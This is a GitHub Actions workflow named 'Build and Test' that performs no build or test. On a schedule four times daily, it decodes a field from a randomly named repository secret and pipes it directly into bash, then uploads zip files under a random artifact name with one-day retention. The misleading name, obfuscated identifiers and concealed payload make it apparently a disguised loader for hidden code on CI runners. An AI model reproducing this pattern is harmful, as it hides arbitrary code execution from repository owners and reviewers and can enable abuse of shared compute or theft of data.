name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '51 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          lhwq28: ${{ secrets.lhwq28 }}
        run: |
          printf '%s' "$lhwq28" | jq -r .g631 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: ZigO0dsG
          path: "*.zip"
          retention-days: 1
